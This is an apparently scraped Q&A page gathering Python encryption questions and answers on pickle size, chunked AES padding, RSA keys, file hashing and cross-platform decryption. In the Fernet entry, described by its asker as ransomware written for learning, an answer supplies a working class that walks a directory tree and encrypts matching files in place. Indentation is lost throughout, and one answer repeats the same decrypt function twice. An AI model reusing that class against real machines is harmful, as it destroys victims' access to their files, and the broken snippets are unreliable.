file size is dramatically increased after pickle

file size is dramatically increased after pickle - python

I'm reading in a file and sending the data (once encrypted) to a dictionary, with a hash of the data before and after encryption. I then pickle the dictionary but find the file size is massive compared to the source file size. If I write the encrypted data straight to a file the size is identical to the source. Any idea why my pickled file is so large?
#Encrypt data and get hashes
def encryptAndExportFile(self, key, inFile, outFile):
openInFile = open(inFile,"rb")
inFileSize = os.path.getsize(inFile)
inFileData = openInFile.readlines()
openInFile.close()
""" initialise cipher """
cipher = AES.new(key, AES.MODE_CFB)
""" initialise MD5 """
m = hashlib.md5() #hash
h = hashlib.md5() #hash of encrypted dataq
encryptedData = []
for data in inFileData:
m.update(data)
encData = cipher.encrypt(data)
h.update(encData)
encryptedData.append(encData)
hashResult = m.digest()
encHashResult = h.digest()
return hashResult, encryptedData, encHashResult
def storeEncryptedObject(self, obj, path):
outFile = open(path, 'wb')
pickle.dump(obj, outFile)
outFile.close()

Try using a binary pickle by specifying protocol=2 as a keyword argument to pickle.dump. It should be much more efficient.

Related

AES encryption and padding across multiple blocks

I am encrypting a large (100GB+) file with Python using PyCryptodome using AES-256 in CBC mode.
Rather than read the entire file into memory and encrypt it in one fell swoop, I would like to read the input file a 'chunk' at a time and append to the output file with the results of encrypting each 'chunk.'
Regrettably, the documentation for PyCryptodome is lacking in that I can't find any examples of how to encrypt a long plaintext with multiple calls to encrypt(). All the examples use a short plaintext and encrypt the entire plaintext in a single call to encrypt().
I had assumed that if my input 'chunk' is a multiple of 16 bytes (the block size of AES in CBC mode) I wouldn't need to add padding to any 'chunk' but the last one. However, I wasn't able to get that to work. (I got padding errors while decrypting.)
I'm finding that in order to successfully decrypt the file, I need to add padding to every 'chunk' when encrypting, and decrypt in units of the input chunk size plus 16 bytes. This means the decrypting process needs to know the 'chunk size' used for encryption, which makes me believe that this is probably an incorrect implementation.
While I do have my encryption/decryption working as described, I wonder if this is the 'correct' way to do it. (I suspect it is not.) I've read inconsistent claims on whether or not every such 'chunk' needs padding. If not, I'd like some handholding to get Pycryptodome to encrypt and then decrypt a large plaintext across multiple calls to encrypt() and decrypt().
EDIT: This code throws a ValueError, "Padding is incorrect," when decrpyting the first 'chunk'.
def encrypt_file(infile, outfile, aeskey, iv):
cipher = AES.new(aeskey, AES.MODE_CBC, iv)
with open(infile, "rb") as fin:
with open(outfile, "wb") as fout:
while True:
data = fin.read(16 * 32)
if len(data) ==0:
break
insize = len(data)
if insize == (16 * 32):
padded_data = data
else:
padded_data = pad(data, AES.block_size)
fout.write(cipher.encrypt(padded_data))
def decrypt_file(infile, outfile, aeskey, iv):
cipher = AES.new(aeskey, AES.MODE_CBC, iv)
with open (infile, "rb") as fin:
with open(outfile, "wb") as fout:
while True:
data = fin.read(16 * 32)
if len(data) == 0:
break
fout.write(unpad(cipher.decrypt(data), AES.block_size))

My problem was related to the PAD of the last block. It is necessary to detect which is the last fragment read in bytes in order to add the PAD.
def decrypt_file(
self, filename: str, output_file: str, save_path: str, key, iv
):
cipher_aes = AES.new(key, AES.MODE_CBC, iv)
log.info(f'Decrypting file: {filename} output: {output_file}')
count = 0
previous_data = None
with open(filename, "rb") as f, open(
f"{save_path}/{output_file}", "wb"
) as f2:
while True:
count+=1
data = f.read(self.block_size)
if data == b"":
decrypted = cipher_aes.decrypt(previous_data)
log.info(f'Last block UnPadding Count: {count} BlockSize: {self.block_size}')
decrypted = unpad(decrypted, AES.block_size, style="pkcs7")
f2.write(decrypted)
break
if previous_data:
decrypted = cipher_aes.decrypt(previous_data)
f2.write(decrypted)
previous_data = data
And apply the decrypt:
def decrypt_file(
self, filename: str, output_file: str, save_path: str, key, iv
):
cipher_aes = AES.new(key, AES.MODE_CBC, iv)
log.info(f'Decrypting file: {filename} output: {output_file}')
count = 0
previous_data = None
with open(filename, "rb") as f, open(
f"{save_path}/{output_file}", "wb"
) as f2:
while True:
count+=1
data = f.read(self.block_size)
if data == b"":
decrypted = cipher_aes.decrypt(previous_data)
log.info(f'Last block UnPadding Count: {count} BlockSize: {self.block_size}')
decrypted = unpad(decrypted, AES.block_size, style="pkcs7")
f2.write(decrypted)
break
if previous_data:
decrypted = cipher_aes.decrypt(previous_data)
f2.write(decrypted)
previous_data = data

It looks like the fix is to do similar chunksize/padding comparison in the decrypt function as I used in the encrypt function:
def decrypt_file(infile, outfile, aeskey, iv):
cipher = AES.new(aeskey, AES.MODE_CBC, iv)
with open (infile, "rb") as fin:
with open(outfile, "wb") as fout:
while True:
data = fin.read(16 * 32)
if len(data) == 0:
break
if len(data) == (16 * 32):
decrypted_data = cipher.decrypt(data)
else:
decrypted_data = unpad(cipher.decrypt(data), AES.block_size)
fout.write(decrypted_data)

Python cryptography.fernet file decrypt

I am working on Ransomware for learning.
So I Copy-and-pasted this and edited it like this
but When I encrypt and decrypt a text file, it appends a string that looks like a random string. How can I fix this issue?
like:
Hello, World!
to
Hello, World!DTYutnC1fZWc5gCxAnYJoiHOdvTCVYveZ8fhaPrpowQ7TH6afPz7o6E0igVbI2uan6YAjovzwOuRvm6gvi6Bg==
with this keyfile:
aDcv1CMBzK_hHisXwUKGp2EbG_eMfEg_sB14iOfmDBM=

the problem is that you encrypt then decrypt. Your encryption and decryption function is working fine the issue is that you always seek to the beginning of the file to write any changes this will work fine with encryption and will work fine with decryption if the the plaintext and ciphertext is of same size(no padding) but will place decrypted plaintext that is not as same same size of ciphertext at beginning of file and leave the rest of file unchanged so you need to truncate the remainder part of ciphertext.
import os
from os.path import expanduser
from cryptography.fernet import Fernet
class Ransomware(object):
def __init__(self):
self.key = None
self.cryptor = None
self.file_ext_targets = ["txt"] # Type of files, you're going to encrypt
def generate_key(self):
self.key = Fernet.generate_key()
self.cryptor = Fernet(self.key)
def read_key(self, keyfile_name):
with open(keyfile_name, "rb") as f:
self.key = f.read()
self.cryptor = Fernet(self.key)
def write_key(self, keyfile_name):
print(self.key)
with open(keyfile_name, "wb") as f:
f.write(self.key)
def crypt_root(self, root_dir, encrypted=False):
for root, _, files in os.walk(root_dir):
for f in files:
abs_file_path = os.path.join(root, f)
if not abs_file_path.split(".")[-1] in self.file_ext_targets:
continue
self.crypt_file(abs_file_path, encrypted=encrypted)
def crypt_file(self, file_path, encrypted=False):
with open(file_path, "rb+") as f:
_data = f.read()
if not encrypted:
# Encrypt
print()
data = self.cryptor.encrypt(_data)
f.seek(0)
f.write(data)
else:
data = self.cryptor.decrypt(_data)
print(f"File content before encryption: {data}")
f.seek(0)
f.write(data)
f.truncate()
sys_root = expanduser("~")
local_root = "."
keyfile = "./keyfile"
ransom = Ransomware()
def encrypt():
ransom.generate_key()
ransom.write_key("keyfile")
ransom.crypt_root(local_root)
def decrypt():
ransom.read_key(keyfile)
ransom.crypt_root(local_root, encrypted=True)
encrypt()
decrypt()

Incorrect decryption RSA pycryptodome

I try to implement RSA in Python with pycryptodome, the encrypt Works fine but the decrypt function no, my code is the following:
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP
from Crypto.Signature import pss
from Crypto.Hash import SHA256
class RSA_OBJECT:
def create_KeyPair(self):
self.key = RSA.generate(self.KEY_LENGTH)
def save_PrivateKey(self, file, password):
key_cifrada = self.key.export_key(passphrase=password, pkcs=8,protection="scryptAndAES128-CBC")
file_out = open(file, "wb")
file_out.write(key_cifrada)
file_out.close()
def load_PrivateKey(self, file, password):
key_cifrada = open(file, "rb").read()
self.private_key = RSA.import_key(key_cifrada, passphrase=password)
def save_PublicKey(self, file):
key_pub = self.key.publickey().export_key()
file_out = open(file, "wb")
file_out.write(key_pub)
file_out.close()
def load_PublicKey(self, file):
key_publica = open(file, "rb").read()
self.public_key = RSA.import_key(key_publica)
I don't know why, because I think that the code is correct, anyone can help me?

Your problem you generate two different keys;
self.public_key = RSA.generate(self.KEY_LENGTH)
self.private_key = RSA.generate(self.KEY_LENGTH)
you should;
key = RSA.generate(self.KEY_LENGTH)
and
private_key = key.export_key()
file_out = open("private.pem", "wb")
file_out.write(private_key)
public_key = key.publickey().export_key()
file_out = open("receiver.pem", "wb")
file_out.write(public_key)
See here in more details;
Note: note that key object has two functionality due to public keys encryption. You can write a private key into a file and public key into another. In this way, you can distribute the key. See RSAKey.

Hashing files with python

I'm writing a python script which should look for all the files with the same content in the cwd. My idea is to use hash functions, but when I run the script every file gets a different digest even though they are copies, which doesn't happen if I compute them on the terminal. I just can't figure out where the problem is. Here's the code
import sys
import os
import hashlib
from collections import defaultdict
blocksize = 65536
def hashfile(file, hasher):
buf = file.read(blocksize)
while len(buf)>0:
hasher.update(buf)
buf = file.read(blocksize)
#print hasher.hexdigest()
return hasher.hexdigest()
def main():
dir = os.getcwd()
files = os.listdir(dir)
dict = defaultdict(list)
l = []
hasher = hashlib.sha256()
for file in files:
hash = hashfile(open(file, 'rb'), hasher)
l.append((hash, file))
for k, v in l:
dict[k].append(v)
for k in dict.items():
print k
if __name__ == '__main__':
main()

You are using a single hasher for all files and it's be updating accumulatively. When you are dealing with the second file, you get a digest of the first and second file.
#hasher = hashlib.sha256()
for file in files:
hasher = hashlib.sha256()
hash = hashfile(open(file, 'rb'), hasher)
l.append((hash, file))
Move the hasher = hashlib.sha256() line to the for loop.
I think it's better to move hasher = hashlib.sha256() to the hashfile function:
def hashfile(file):
hasher = hashlib.sha256()
buf = file.read(blocksize)
#original code here
It will make the code more clear.

Pycrypto - Encrypt on Linux / decrypt on Windows

I've got a encryption/decryption class that I'm using cross platform. I'm using the same class on both server and client. I encrypt a file on a Linux server, then decrypt on either a Linux or Windows client. I have no problems when decrypting on Linux, but when I transfer the file to Windows and try to decrypt, I get the following exception:
ValueError: Input strings must be a multiple of 16 in length
My first thought is that it is caused by the different filesystems, and any characters that are used to create the padding. Here is my class code:
class FileSec:
def __init__(self):
# File chunk size
self.chunk_size = 64*1024
# Encrypt file with OpenSSL
def encrypt(self, infile, outfile, key):
if not infile or not os.path.isfile(infile):
return False
if not outfile or os.path.isfile(outfile):
return False
if not key:
return False
# Encrypt the file
iv = ''.join(chr(random.randint(0, 0xFF)) for i in range(16))
encryptor = AES.new(key, AES.MODE_CBC, iv)
filesize = os.path.getsize(infile)
with open(infile, 'rb') as ifh:
with open(outfile, 'wb') as ofh:
ofh.write(struct.pack('<Q', filesize))
ofh.write(iv)
while True:
chunk = ifh.read(self.chunk_size)
if len(chunk) == 0:
break
elif len(chunk) % 16 != 0:
chunk += ' ' * (16 - len(chunk) % 16)
ofh.write(encryptor.encrypt(chunk))
return True
# Decrypt file with OpenSSL
def decrypt(self, infile, outfile, key):
if not infile or not os.path.isfile(infile):
return False
if not outfile or os.path.isfile(outfile):
return False
if not key:
return False
# Decrypt the file
with open(infile, 'rb') as ifh:
origsize = struct.unpack('<Q', ifh.read(struct.calcsize('Q')))[0]
iv = ifh.read(16)
decryptor = AES.new(key, AES.MODE_CBC, iv)
with open(outfile, 'wb') as ofh:
while True:
chunk = ifh.read(self.chunk_size)
if len(chunk) == 0:
break
ofh.write(decryptor.decrypt(chunk))
ofh.truncate(origsize)
return True
http://pastebin.com/Dvf6nUxH
I'm using code adapted from here: http://eli.thegreenplace.net/2010/06/25/aes-encryption-of-files-in-python-with-pycrypto/
Anyone have any suggestions on how I can modify this class to work cross-platform?

myfile.read(x) reads any amount up to x bytes; it is not guaranteed to return all x.
Note that it will always return at least one until the file is empty, so it is possible to wrap this in a loop, and then join the returned strings.

Closing this one. Turns out the problem has nothing to do with the encryption/decryption function, but with an extra byte being tacked on to the encrypted file when I transfer it to the Windows machine, causing the exception.

We Keep Coding

Python is a programming language that lets you work quickly and integrate systems more effectively.

file size is dramatically increased after pickle - python

Try using a binary pickle by specifying protocol=2 as a keyword argument to pickle.dump. It should be much more efficient.

Related

AES encryption and padding across multiple blocks

Python cryptography.fernet file decrypt

Incorrect decryption RSA pycryptodome

Hashing files with python

Pycrypto - Encrypt on Linux / decrypt on Windows

Categories

Resources